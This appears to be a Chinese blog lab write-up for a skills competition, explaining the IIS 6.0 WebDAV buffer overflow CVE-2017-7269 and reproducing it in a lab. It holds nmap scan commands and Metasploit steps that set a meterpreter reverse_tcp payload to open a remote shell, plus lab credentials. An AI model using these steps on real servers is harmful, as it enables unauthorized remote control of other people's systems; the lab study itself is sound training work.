E035-服务漏洞利用及加固-利用CVE-2017-7269漏洞渗透IIS6.0实现远程控制

于 2023-10-15 15:55:36 发布
阅读量189 收藏 2
点赞数 1
分类专栏: 省技能大赛模块  系统服务安全 漏洞利用学习 文章标签: 服务器 windows 网络安全 系统安全 web安全 安全威胁分析 网络攻击模型
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_73252299/article/details/133842337
版权

实验等级:

中级

任务场景:

【任务场景】

        磐石公司邀请渗透测试人员对该公司的对外提供服务的服务器进行渗透测试,发现公司一台业务服务器运行了IIS6.0的中间件,被植入了后门,进入服务器进行代码审计的过程中发现了,服务器被入侵的痕迹,我们以渗透者的角度出发,来探索为何该服务器会出现这样的漏洞。 

任务分析:

【任务分析】

        Windows Server 2003R2版本IIS6.0的WebDAV服务中的ScStoragePathFromUrl函数存在缓存区溢出漏洞,远程攻击者通过以“If: <http://”开头的长header PROPFIND请求,执行任意代码。目前针对 Windows Server 2003 R2 可以稳定利用,该漏洞最早在2016年7,8月份开始在野外被利用。 

预备知识:

【预备知识】

        WebDAV是一种基于 HTTP 1.1协议的通信协议.它扩展了HTTP 1.1,在GET、POST、HEAD等几个HTTP标准方法以外添加了一些新的方法。使应用程序可直接对Web Server直接读写,并支持写文件锁定(Locking)及解锁(Unlock),还可以支持文件的版本控制。IIS实现Webdav是采用的其两种接口CGI、ISAPI的ISAPI接口。但因为其没有采用影射的方式,所以IIS的主程序w3svc.dll本身包含了Webdav的信息。其识别出是Webdav的请求后就调用Webdav的处理模块httpext.dll。对于常见几种请求方法GET、HEAD、POST等,因为常见一些映射都支持。所以不能以请求方法作为Webdav请求的判断,w3svc.dll就根据请求头的字段识别。如果请求头里面包含Translate:、If:、Lock-Token:中的一种,就认为是Webdav的请求。Translate:就是那个Translate:f的泄露源代码的一个请求头,其实设置别的两个也是一样的。可能很多IDS是没有这点知识的。W3svc.dll还内置了几个别的请求方法TRACK、TRACE等。TRACK就是用于调试错误的,如果收到这样的请求头,w3svc.dll会原样返回请求数据。相当于我们常见的ping.exe。IIS对TRACK请求没有进行LOG记录,这点我们可以用于来获得banner。对于IIS将优于大家习惯使用的HEAD。如果上面的请求方法没匹配,那么w3svc.dll就会认为是Webdav的请求,交给httpext.dll处理了。这些请求包含Webdav支持的PROPFIND、PROPPATCH、MKCOL、DELETE、PUT、COPY、MOVE、LOCK、UNLOCK等。

        为了安全上的考虑,IIS默认并不会启动WebDAV的功能,因此必须另外来激活它。通过启动“IIS管理器”,展开本地计算机,选择“Web服务扩展”,选择“允许”的途径来启动WebDAV功能。开启WebDAV之后,IIS就支持PROPFIND、PROPPATCH、MKCOL、DELETE、PUT、COPY、MOVE、LOCK、UNLOCK等方法了。当IIS中的配置允许写入的时候就可以直接PUT文件上去,由此可能引发非常严重的安全问题,强烈建议禁制

        当开启了WebDAV后,IIS中又配置了目录可写,便会产生很严重的问题。开启WebDAV服务的IIS 6.0被爆存在缓存区溢出漏洞导致远程代码执行,目前针对 Windows Server 2003 R2 可以稳定利用,该漏洞最早在2016年7,8月份开始被利用。

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

任务实施:

E035-服务漏洞利用及加固-利用CVE-2017-7269漏洞渗透IIS6.0实现远程控制

任务环境说明:

服务器场景:p9_kali-7(用户名:root;密码:toor)

服务器场景操作系统:Kali Linux   

服务器场景:p9_ws03-7(用户名:administrator;密码:123456)

服务器场景操作系统:Microsoft Windows2003 Server

网络拓扑

实战复现

        使用命令zenmap打开nmap图形化扫描工具,选择配置,点击新的配置或命令

第四步,找到模块http-webdav-scan,勾上选用该模块对目标靶机进行扫描

我就不使用图形化扫描了,直接用命令行。

nmap -T4 -A -v --script http-webdav-scan

        根据扫描结果的信息可以找到靶机的操作系统为Microsoft Windows Server 2003 R2,并且开启WebDAV服务的IIS6.0,初步可以确认该漏洞存在

服务器版本信息:

使用search命令搜索cve-2017-7269

使用use命令利用该模块,同时使用show options命令来查看需要配置的参数

msfconsole
search cve-2017-7269
use exploit/windows/iis/cve-2017-7269
show options

设置目标靶机ip

        使用set payload windows/meterpreter/reverse_tcp设置攻击的载荷,然后使用命令set LHOST设置回连的地址,并执行exploit溢出攻击模块

set RHOST 192.168.1.112
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.102

实验结束,关闭虚拟机。

孪生质数-希灵Sec
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
IIS6.0远程代码执行漏洞复现(CVE-2017-7269)
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-28 1326
提权文件下载:点此下载 靶机:Windows server 2003 r2 EXP:https://github.com/zcgonvh/cve-2017-7269 把EXP导入Metasploit 启动MSF 尝试加载攻击模块 发现找不到该模块,这是因为msf不识别-,把-改为下划线就好了 重新启动程序 成功加载攻击模块 查看需要设置的参数 设置参数 加载攻击载荷 开始攻击 攻...
IIS 6.0远程代码执行漏洞CVE-2017-7269
weixin_33737134的博客
03-30 279
  漏洞简介  Microsoft Windows Server 2003 R2是美国微软(Microsoft)公司发布的一套服务器操作系统。InternetInformation Services(IIS)是一套运行于Microsoft Windows中的互联网基本服务。  Microsoft Windows Server 2003 R2中的IIS 6.0版本中的WebDA...
CVE-2017-7269IIS 6.0 WebDAV远程代码执行漏洞分析
weixin_30344131的博客
04-02 228
漏洞描述: 3月27日,在Windows 2003 R2上使用IIS 6.0 爆出了0Day漏洞CVE-2017-7269),漏洞利用PoC开始流传,但糟糕的是这产品已经停止更新了。网上流传的poc下载链接如下。 github地址:https://github.com/edwardz246003/IIS_exploit 结合上面的POC,我们对漏洞的成因及利用过程进行了详细的分析。在分析过...
IIS 6.0 WebDAV远程代码执行漏洞利用CVE-2017-7269)-附件资源
03-05
IIS 6.0 WebDAV远程代码执行漏洞利用CVE-2017-7269)-附件资源
IIS 6.0 WebDAV远程代码执行0day漏洞 CVE-2017-7269 PoC已经公开了 但Windows 2003已经没有更新服务了...
weixin_34301132的博客
09-01 713
3月27日,在Windows 2003 R2上使用IIS 6.0 爆出了0Day漏洞CVE-2017-7269,CNNVD-201703-1151),PoC开始流传,但糟糕的是这产品已经停止更新了,建议大家要么关闭IIS 下的WebDAV服务,要么升级到Windows 2016。绿盟科技发布威胁预警通告,全文如下。 Update:绿盟科技已经发布了该...
E041-服务漏洞利用加固-利用CVE-2018-4878漏洞上传实现远程控制.pdf
12-02
该课程主要讲解了如何利用CVE-2018-4878漏洞进行服务漏洞利用加固CVE-2018-4878是一个Adobe Flash Player的安全漏洞,允许攻击者通过特制的SWF文件执行任意代码,从而实现远程控制目标系统。此过程分为多个步骤...
E037-服务漏洞利用加固-利用CVE-2017-8464漏洞实现LNK文件远程代码执行.pdf
12-02
E037-服务漏洞利用加固-利用CVE-2017-8464漏洞实现LNK文件远程代码执行
E042-服务漏洞利用加固-利用CVE-2018-12613漏洞实现远程文件包含.pdf
12-02
E042-服务漏洞利用加固-利用CVE-2018-12613漏洞实现远程文件包含
Jboss Application Server反序列化命令执行漏洞利用工具(CVE-2017-12149)
07-23
2017年,它被发现存在一个严重的安全漏洞,被称为CVE-2017-12149,这是一个反序列化漏洞,允许远程攻击者通过精心构造的输入来执行任意系统命令,从而对受影响的系统造成严重威胁。 反序列化是将已序列化的对象...
IIS "IP and domain restrictions" 绕过漏洞(CVE-2014-4078)
02-09
【该漏洞通过版本比较方式检测,结果可能不准确,需要根据实际情况确认。】Microsoft Internet信息服务IIS)是Microsoft Windows自带的一个网络信息服务器,其中包含HTTP服务功能。 "IP and domain restrictions" ...
iis6.0远程代码执行漏洞
G208_522的博客
11-20 3451
iis6.0远程代码执行漏洞 1、实验环境搭建 目标主机Windows server2003 sp2 2、目标服务器需要在IIS里面开启WebDAV 3、靶机IP:192.168.149.136(需要改成自己虚拟机win2003的地址) Kali IP : 192.168.149.150(需要改成自己虚拟机kali的地址) 4、打开kali并且 把exp 复制到kali的/usr/share/metasploit-framework/modules/exploits/windows/iis目录下: k
CVE-2017-7269IIS6.0远程代码执行漏洞
bring_coco的博客
03-04 716
一.漏洞介绍 IIS6.0Web服务扩展中开启WebDAV,webDAV服务存在缓冲区溢出漏洞,造成远程代码执行 二.漏洞影响 Windows Server 2003 三.复现过程 环境:kali(10.0.78.19) Windows Server 2003(10.0.78.20) 1.打开Windows Server 2003中IISWebDAV 2.下载EXP 下载网址:https://github.com/zcgonvh/cve-2017-7269 将EXP复制到kali的/usr/share
IIS6.0远程代码执行漏洞复现[CVE-2017-7269]
qq_36711588的博客
03-03 490
IIS6.0远程代码执行漏洞复现[CVE-2017-7269]
复现CVE-2017-7269(IIS6.0远程代码执行)漏洞
记录并分享学习安全的知识点..
03-03 1885
前言: 今天小编挖到了一个高危漏洞,打进去以后,给的用户权限太低了,尝试了好久的提权。虽然最后没提权成功,起码也攻进去了,也是可看见系统盘所有目录下所有的关键资料,整理报告完成了也索性就记录一下趴! 警告 请勿使用本文提到的内容违反法律。 本文不提供任何担保。 一、漏洞介绍 Windows Server 2003R2版本IIS6.0WebDAV服务中的ScStoragePathFromUrl函数存在缓存区溢出漏洞,远程攻击者通过以“If: <http://”开头的长header PRO
IIS6远程执行漏洞复现
最新发布
weixin_53696027的博客
03-01 481
通过自己搭建靶场复现IIS远程命令执行漏洞
IIS 6.0 WebDAV远程代码执行漏洞利用CVE-2017-7269
mirror97black的博客
01-24 4266
漏洞简介 漏洞编号:CVE-2017-7269 发现人员:Zhiniang Peng和Chen Wu(华南理工大学信息安全实验室,计算机科学与工程学院) 漏洞简述:开启WebDAV服务IIS 6.0被爆存在缓存区溢出漏洞导致远程代码执行,目前针对 Windows Server 2003 R2 可以稳定利用,该漏洞最早在2016年7,8月份开始在野外被利用漏洞类型:缓冲区溢出 漏洞
iis6.0cve-2017-7269)最完整的利用,从远程利用,到本地提权,再到常见失败原因
redwand的博客
05-04 1243
网上看到的iis6.0cve-2017-7269)的利用文章,要么只有远程利用不包含本地提权,要么包含本地提权却没有常见失败原因,故有此文 本篇文章面向有一点windows命令行基础,kali基础,msf基础的同学
Web中间件漏洞复现合集---IIS
ierciyuan的博客
11-05 5533
复现IIS常见的一些漏洞,包括PUT漏洞、短文件名猜解、远端代码执行(cve-2017-7269/ms-15-034)、解析漏洞等。提供IIS6.0.exe、iiswrite等工具。
iis常见漏洞(中间件常见漏洞
qq_56438857的博客
08-17 8957
漏洞的意义:1、 猜解后台地址2、 猜解敏感文件,例如备份的rar、zip、.bak、.sql文件等。3、 在某些情形下,甚至可以通过短文件名web直接下载对应的文件。该漏洞的局限性:1、 只能猜解前六位,以及扩展名的前三位。2、 名称较短的文件是没有相应的短文件名的。3、 不支持中文文件名4、 如果文件名前6位带空格,8.3格式的短文件名会补进,和真实文件名不匹配5、 需要IIS和.net两个条件都满足。...
Apache Spark 命令注入(CVE-2022-33891)格式化文档
08-10
Apache Spark 命令注入漏洞CVE-2022-33891)是 Apache Spark 中的一种高危漏洞,允许攻击者通过命令注入来执行恶意命令,从而控制服务器。该漏洞影响 Apache Spark 版本小于 3.0.3、3.1.1 到 3.1.2 以及 3.3.0 及...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

孪生质数-希灵Sec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值